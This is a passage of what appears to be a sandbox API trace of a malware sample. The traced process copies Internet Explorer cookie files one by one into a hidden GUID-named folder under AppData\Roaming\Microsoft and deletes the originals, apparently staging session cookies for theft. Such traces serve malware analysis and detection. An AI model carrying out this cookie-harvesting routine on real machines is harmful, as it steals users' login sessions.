(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\9Z1Y5ICI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\9z1y5ici.txt")) returned 1 [0252.143] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.143] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.143] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.143] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.143] StrChrW (lpStart="Low\\A0RK8A2H.txt", wMatch=0x74c005c) returned="\\A0RK8A2H.txt" [0252.143] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.143] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.143] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.143] StrChrW (lpStart="A0RK8A2H.txt", wMatch=0x74c005c) returned 0x0 [0252.143] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="A0RK8A2H.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\A0RK8A2H.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\A0RK8A2H.txt" [0252.143] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\A0RK8A2H.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\a0rk8a2h.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\A0RK8A2H.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\a0rk8a2h.txt"), bFailIfExists=0) returned 1 [0252.148] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\A0RK8A2H.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\a0rk8a2h.txt")) returned 1 [0252.150] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.150] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.150] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.150] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.150] StrChrW (lpStart="Low\\AA2IJ7JU.txt", wMatch=0x74c005c) returned="\\AA2IJ7JU.txt" [0252.150] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.150] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.150] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.150] StrChrW (lpStart="AA2IJ7JU.txt", wMatch=0x74c005c) returned 0x0 [0252.150] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="AA2IJ7JU.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\AA2IJ7JU.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\AA2IJ7JU.txt" [0252.150] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\AA2IJ7JU.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\aa2ij7ju.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\AA2IJ7JU.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\aa2ij7ju.txt"), bFailIfExists=0) returned 1 [0252.155] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\AA2IJ7JU.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\aa2ij7ju.txt")) returned 1 [0252.157] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.157] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.157] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.157] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.157] StrChrW (lpStart="Low\\B427TFXJ.txt", wMatch=0x74c005c) returned="\\B427TFXJ.txt" [0252.157] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.157] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.157] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.157] StrChrW (lpStart="B427TFXJ.txt", wMatch=0x74c005c) returned 0x0 [0252.157] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="B427TFXJ.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\B427TFXJ.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\B427TFXJ.txt" [0252.157] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\B427TFXJ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\b427tfxj.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\B427TFXJ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\b427tfxj.txt"), bFailIfExists=0) returned 1 [0252.191] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\B427TFXJ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\b427tfxj.txt")) returned 1 [0252.192] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.193] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.193] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.193] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.193] StrChrW (lpStart="Low\\BK4HNAZ1.txt", wMatch=0x74c005c) returned="\\BK4HNAZ1.txt" [0252.193] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.193] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.193] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.193] StrChrW (lpStart="BK4HNAZ1.txt", wMatch=0x74c005c) returned 0x0 [0252.193] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="BK4HNAZ1.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\BK4HNAZ1.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\BK4HNAZ1.txt" [0252.193] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\BK4HNAZ1.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\bk4hnaz1.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\BK4HNAZ1.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\bk4hnaz1.txt"), bFailIfExists=0) returned 1 [0252.199] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\BK4HNAZ1.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\bk4hnaz1.txt")) returned 1 [0252.200] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.200] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.200] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.201] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.201] StrChrW (lpStart="Low\\CC7DS78R.txt", wMatch=0x74c005c) returned="\\CC7DS78R.txt" [0252.201] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.201] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.201] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.201] StrChrW (lpStart="CC7DS78R.txt", wMatch=0x74c005c) returned 0x0 [0252.201] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="CC7DS78R.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\CC7DS78R.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\CC7DS78R.txt" [0252.201] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\CC7DS78R.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\cc7ds78r.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\CC7DS78R.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\cc7ds78r.txt"), bFailIfExists=0) returned 1 [0252.206] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\CC7DS78R.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\cc7ds78r.txt")) returned 1 [0252.207] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.207] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.207] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.207] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.207] StrChrW (lpStart="Low\\CDGOWO27.txt", wMatch=0x74c005c) returned="\\CDGOWO27.txt" [0252.207] lstrcatW (in: 